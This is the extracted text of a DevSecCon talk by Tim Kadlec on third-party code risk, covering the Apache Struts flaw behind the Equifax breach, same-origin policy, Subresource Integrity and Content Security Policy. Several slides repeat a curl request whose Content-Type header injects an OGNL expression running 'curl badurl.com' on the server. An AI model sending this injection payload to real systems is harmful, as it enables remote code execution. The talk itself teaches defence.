Date post: | 21-Jan-2018 |
Category: |
Technology |
Upload: | devseccon-limited |
View: | 190 times |
Download: | 1 times |
Join the conversation #DevSecCon
BY TIM KADLEC @TKADLEC
Their Problems Are Your Problems
THEIR PROBLEMS AREYOUR PROBLEMS
Tim Kadlec | @tkadlec
HELL IS OTHER PEOPLE’S CODECODE
CODE
CODE
CONTEXT
OPINIONS
ASSUMPTIONS
WEB IS POWERED BY OTHER PEOPLE’S CODE
9 MILLION Different Users
28% More artifacts indexed in past year
23,411,471 Packages downloaded per month
HUGE BOOST FOR PRODUCTIVITY
1,000 DEPENDENCIES
1,000 DEPENDENCIES~5 CONTRIBUTORS
1,000 DEPENDENCIES~5 CONTRIBUTORS
5,000 DEVELOPERS
5,000 DEVELOPERS
OFFLOAD THE WORK But not the
RISK
OFFLOAD THE WORK But not the
RESPONSIBILITY
curl http://demo/struts -H "Content-Type: % {(#_='multipart/form-data'). (#[email protected]@DEFAULT_MEMBER_ACCESS). (@java.lang.Runtime@getRuntime().exec('curl badurl.com'))}"
curl http://demo/struts -H "Content-Type: % {(#_='multipart/form-data'). (#[email protected]@DEFAULT_MEMBER_ACCESS). (@java.lang.Runtime@getRuntime().exec('curl badurl.com'))}"
curl http://demo/struts -H "Content-Type: % {(#_='multipart/form-data'). (#[email protected]@DEFAULT_MEMBER_ACCESS). (@java.lang.Runtime@getRuntime().exec('curl badurl.com'))}"
public HttpServletRequest wrapRequest(HttpServletRequest request) throws IOException { ... if (content_type != null && content_type.contains("multipart/form-data")) { ... request = new MultiPartRequestWrapper(mpr, request, getSaveDir(), provider, disableRequestAttributeValueStackLookup); } else { request = new StrutsRequestWrapper(request, disableRequestAttributeValueStackLookup); }
return request; }
public HttpServletRequest wrapRequest(HttpServletRequest request) throws IOException { ... if (content_type != null && content_type.contains("multipart/form-data")) { ... request = new MultiPartRequestWrapper(mpr, request, getSaveDir(), provider, disableRequestAttributeValueStackLookup); } else { request = new StrutsRequestWrapper(request, disableRequestAttributeValueStackLookup); }
return request; }
public HttpServletRequest wrapRequest(HttpServletRequest request) throws IOException { ... if (content_type != null && content_type.contains("multipart/form-data")) { ... request = new MultiPartRequestWrapper(mpr, request, getSaveDir(), provider, disableRequestAttributeValueStackLookup); } else { request = new StrutsRequestWrapper(request, disableRequestAttributeValueStackLookup); }
return request; }
String errorMessage = buildErrorMessage(e, new Object[]{e.getPermittedSize(), e.getActualSize()});
curl http://demo/struts -H "Content-Type: % {(#_='multipart/form-data'). (#[email protected]@DEFAULT_MEMBER_ACCESS). (@java.lang.Runtime@getRuntime().exec('curl badurl.com'))}"
MARCH 6: FIXED VERSION RELEASED MARCH 7: EXPLOIT SCRIPTS APPEAR MAY 13-JULY 30: EQUIFAX BREACH SEPTEMBER 7: BREACH ANNOUNCED
0
225
450
675
900
2007 2008 2009 2010 2011 2012 2013 2014 2015 2016 2017
OPEN-SOURCE LIBRARY VULNS BY YEAR
The human error was that the individual who’s responsible for communicating in the organization to apply the patch, did not.
“
EVERYONE’S RESPONSIBILITY
LAYERS OF DEFENSE
77% USE A VULNERABLE JS LIBRARY
~35% Third-Party Resources
(2013)2013
2013
2013
2013
2013 2017
2013 2017~53% Third-Party Resources
77-99% Third-Party Resources
38% of sites
SAME-ORIGIN POLICY
ORIGIN: SCHEME + HOSTNAME + PORT
http://foo.com/index.html
http://foo.com/about.html https://foo.com/index.html http://a.foo.com/about.html http://foo.com:80/about.html
http://foo.com/index.html
http://foo.com/about.html https://foo.com/index.html http://a.foo.com/about.html http://foo.com:80/about.html
http://foo.com/index.html
http://foo.com/about.html https://foo.com/index.html http://a.foo.com/about.html http://foo.com:81/about.html
http://foo.com/index.html
http://foo.com/about.html https://foo.com/index.html http://a.foo.com/about.html http://foo.com:81/about.html
http://foo.com/index.html
http://foo.com/about.html https://foo.com/index.html http://a.foo.com/about.html http://foo.com:81/about.html
http://foo.com/index.html
http://foo.com/about.html https://foo.com/index.html http://a.foo.com/about.html http://foo.com:81/about.html
--disable-web-security
about:blank
javascript:
var xhr = new XMLHttpRequest(); xhr.open('GET', "https://www.devseccon.com/"); xhr.send();
<script src=“..."></script>
<img src="..." />
<link href="..." />
SUBRESOURCE INTEGRITY
<script src="https://foo.com/framework.js" integrity=“sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC"> </script>
<script src="https://foo.com/framework.js" integrity=“sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC"> </script>
CONTENT SECURITY POLICY (CSP)
SAME-ORIGIN POLICY?
WHITELIST
Content-Security-Policy: policy;
Content-Security-Policy: resource-directive source-list;
Content-Security-Policy: script-src ‘self’ https://apis.google.com;
base-uri child-src connect-src font-src form-action frame-ancestors img-src
media-src object-src plugin-types report-uri style-src script-src upgrade-insecure-requests
Content-Security-Policy: default-src ‘self’;
none self unsafe-inline unsafe-eval
Content-Security-Policy: default-src 'self'; script-src ‘nonce-2726c7f26c'
<script nonce="2726c7f26c"> alert(123); </script>
Content-Security-Policy: script-src 'sha256-cLuU6nVzrYJlo7rUa6PFrPQrEUpOHllb5ic='
Content-Security-Policy-Report-Only:
CONTENT-SECURITY-POLICY: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src render.githubusercontent.com; connect-src 'self' uploads.github.com status.github.com api.github.com www.google-analytics.com wss://live.github.com; font-src assets-cdn.github.com; form-action 'self' github.com gist.github.com; frame-ancestors 'none'; frame-src render.githubusercontent.com; img-src 'self' data: assets-cdn.github.com identicons.github.com www.google-analytics.com collector.githubapp.com *.gravatar.com *.wp.com *.githubusercontent.com; media-src 'none'; object-src assets-cdn.github.com; plugin-types application/x-shockwave-flash; script-src assets-cdn.github.com; style-src 'unsafe-inline' assets-cdn.github.com
Content-Security-Policy-Report-Only: default-src https:; form-action https:; report-uri https://myreport.com;
Content-Security-Policy: default-src https:; form-action https:; report-uri https://myreport.com;
CONTENT-SECURITY-POLICY: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src render.githubusercontent.com; connect-src 'self' uploads.github.com status.github.com api.github.com www.google-analytics.com wss://live.github.com; font-src assets-cdn.github.com; form-action 'self' github.com gist.github.com; frame-ancestors 'none'; frame-src render.githubusercontent.com; img-src 'self' data: assets-cdn.github.com identicons.github.com www.google-analytics.com collector.githubapp.com *.gravatar.com *.wp.com *.githubusercontent.com; media-src 'none'; object-src assets-cdn.github.com; plugin-types application/x-shockwave-flash; script-src assets-cdn.github.com; style-src 'unsafe-inline' assets-cdn.github.com
SERVERLESS & PAAS
UNPATCHED SERVERS
COMPROMISED SERVERS
WHAT’S THE PATH OF LEAST RESISTANCE?
SECURE BY DEFAULT
OFFLOAD THE WORK But not the
RESPONSIBILITY
REAL PEOPLE PAYING THE PRICE
SYSTEM CONFIGURATION NETWORK LAYER FRONT-END CODE BACK-END COMPONENTS THIRD-PARTY SERVICES
LAYERS OF DEFENSE
EVERYONE’S RESPONSIBILITY
BRING SECURITY TO THE TEAM
WEB IS POWERED BY OTHER PEOPLE’S CODE
WEB’S SAFETY & STABILITY
IS UP TO US
Join the conversation #DevSecCon
Thank you!Tim Kadlec | @tkadlec